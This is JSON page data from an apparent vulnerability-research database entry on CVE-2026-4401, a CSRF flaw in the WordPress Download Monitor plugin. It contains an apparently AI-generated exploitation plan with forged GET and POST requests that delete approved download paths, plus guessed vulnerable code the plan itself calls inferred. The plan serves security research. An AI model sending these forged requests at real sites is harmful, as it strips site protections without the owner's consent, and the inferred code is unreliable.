[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcNNsQCBt13vsJjzUlcKGgi4yyd_iRXC8N8v2PgeHzBs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4401","download-monitor-cross-site-request-forgery-to-download-path-deletion-and-disabling","Download Monitor \u003C= 5.1.10 - Cross-Site Request Forgery to Download Path Deletion and Disabling","The Download Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in the `actions_handler()` and `bulk_actions_handler()` methods in `class-dlm-downloads-path.php` in all versions up to, and including, 5.1.10. This is due to missing nonce verification on these functions. This makes it possible for unauthenticated attackers to delete, disable, or enable approved download paths via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","download-monitor",null,"\u003C=5.1.10","5.1.11","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Cross-Site Request Forgery (CSRF)","2026-04-07 11:17:36","2026-04-07 23:25:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F33d70481-4652-44f4-99cf-67cc1ffab66a?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Ffrontend-tailwind.css","assets\u002Fcss\u002Ffrontend-tailwind.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.less","assets\u002Fcss\u002Ffrontend.min.css","changelog.txt","download-monitor.php","includes\u002Fadmin\u002Fclass-dlm-upsells.php","researched",false,3,"This exploitation research plan targets CVE-2026-4401 in the Download Monitor plugin. The vulnerability allows an unauthenticated attacker to delete or disable \"Approved Download Paths\" by tricking a site administrator into visiting a malicious link (CSRF), due to missing nonce verification in the administrative handlers.\n\n### 1. Vulnerability Summary\n*   **ID:** CVE-2026-4401\n*   **Vulnerability Type:** Cross-Site Request Forgery (CSRF)\n*   **Location:** `includes\u002Fadmin\u002Fclass-dlm-downloads-path.php` (inferred path based on class name)\n*   **Vulnerable Methods:** `actions_handler()` and `bulk_actions_handler()` in the `DLM_Downloads_Path` class.\n*   **Cause:** These methods process sensitive administrative actions (enabling, disabling, or deleting download paths) without calling `check_admin_referer()` or `wp_verify_nonce()`. Approved paths are a security feature in Download Monitor used to restrict file downloads to specific directories. Deleting or disabling them can disrupt the site's download functionality.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths` (inferred based on plugin architecture for custom admin pages).\n*   **Vulnerable Parameters:**\n    *   `action`: The action to perform (e.g., `delete`, `disable`, `enable`).\n    *   `id`: The ID of the specific approved path to modify.\n*   **Authentication:** Requires a victim with `manage_options` or similar administrative capabilities for the plugin to be logged in.\n*   **Preconditions:** At least one \"Approved Download Path\" must exist.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The `DLM_Downloads_Path` class is instantiated during admin initialization.\n2.  **Hook Registration:** The `actions_handler()` method is likely hooked to `admin_init` or called within the `display()` logic of a `WP_List_Table` subclass.\n3.  **Missing Check:**\n    ```php\n    \u002F\u002F includes\u002Fadmin\u002Fclass-dlm-downloads-path.php (Conceptual\u002FInferred)\n    public function actions_handler() {\n        if ( ! isset( $_GET['action'] ) || ! isset( $_GET['id'] ) ) {\n            return;\n        }\n        \u002F\u002F VULNERABILITY: No check_admin_referer() call here.\n        $action = $_GET['action'];\n        $path_id = intval( $_GET['id'] );\n\n        if ( 'delete' === $action ) {\n            $this->delete_path( $path_id );\n        } elseif ( 'disable' === $action ) {\n            $this->disable_path( $path_id );\n        }\n    }\n    ```\n4.  **Sink:** The `delete_path` or `update` methods interact with the database (likely the `{$wpdb->prefix}dlm_download_paths` table) to remove or modify the record.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is characterized by the **absence** of a nonce check. Therefore, no nonce is required to exploit the `actions_handler()` or `bulk_actions_handler()`. The attack succeeds as long as the request is made by a logged-in administrator.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that an authenticated admin session can be leveraged to delete an approved path without a valid nonce.\n\n**Step 1: Identify\u002FCreate a Path**\nFirst, we must ensure an approved path exists to delete. We can create one via WP-CLI or by navigating the UI.\n\n**Step 2: Construct the CSRF Request**\nThe exploit will use a `GET` request, as administrative handlers in WP List Tables often process `$_GET` parameters for individual actions.\n\n*   **Action:** `delete`\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths&action=delete&id=[PATH_ID]`\n\n**Step 3: Execute Exploit via Agent**\nThe agent will use `http_request` with the admin's cookies to simulate the CSRF.\n\n```javascript\n\u002F\u002F PoC Request Structure\nawait http_request({\n    method: \"GET\",\n    url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths&action=delete&id=1\",\n    headers: {\n        \"Accept\": \"text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,*\u002F*;q=0.8\"\n    }\n});\n```\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure Download Monitor \u003C= 5.1.10 is installed and active.\n2.  **Create Approved Path:** Use WP-CLI to insert a path into the database directly, as the UI might require nonces for the *creation* step (which is not part of this CVE).\n    ```bash\n    # Example SQL to create a path (adjust table prefix as needed)\n    wp db query \"INSERT INTO wp_dlm_download_paths (path, status) VALUES ('\u002Ftmp\u002F', 'enabled');\"\n    ```\n3.  **Identify ID:** Get the ID of the newly created path.\n    ```bash\n    wp db query \"SELECT id FROM wp_dlm_download_paths WHERE path='\u002Ftmp\u002F';\"\n    ```\n\n### 7. Expected Results\n*   The HTTP request should return a `302 Redirect` or a `200 OK` (if the page reloads).\n*   The response should **not** contain a \"Are you sure you want to do this?\" (WordPress's default \"fail2\" nonce error) or a \"Security check failed\" message.\n*   The targeted approved path should be removed from the database.\n\n### 8. Verification Steps\n1.  **Database Check:** Verify the record is gone.\n    ```bash\n    wp db query \"SELECT count(*) FROM wp_dlm_download_paths WHERE path='\u002Ftmp\u002F';\"\n    # Expected: 0\n    ```\n2.  **Admin UI Check:** Navigate to the Approved Paths page to see if the table is empty.\n    ```javascript\n    await browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths\");\n    \u002F\u002F Verify path '\u002Ftmp\u002F' is not visible in the DOM.\n    ```\n\n### 9. Alternative Approaches\nIf `GET` is not processed by the handler, the `bulk_actions_handler()` might require a `POST` request.\n\n**Alternative POST Exploit:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths`\n*   **Body:** `action=bulk_delete&path_id[]=1&path_id[]=2`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n\nIf the page slug `dlm_download_paths` is incorrect, the agent should search the menu:\n`browser_eval(\"document.querySelector('a[href*=\\\"page=dlm\\\"]').href\")` to find the correct administrative page slug for download paths.","gemini-3-flash-preview","2026-04-17 20:54:24","2026-04-17 20:54:48",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","5.1.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]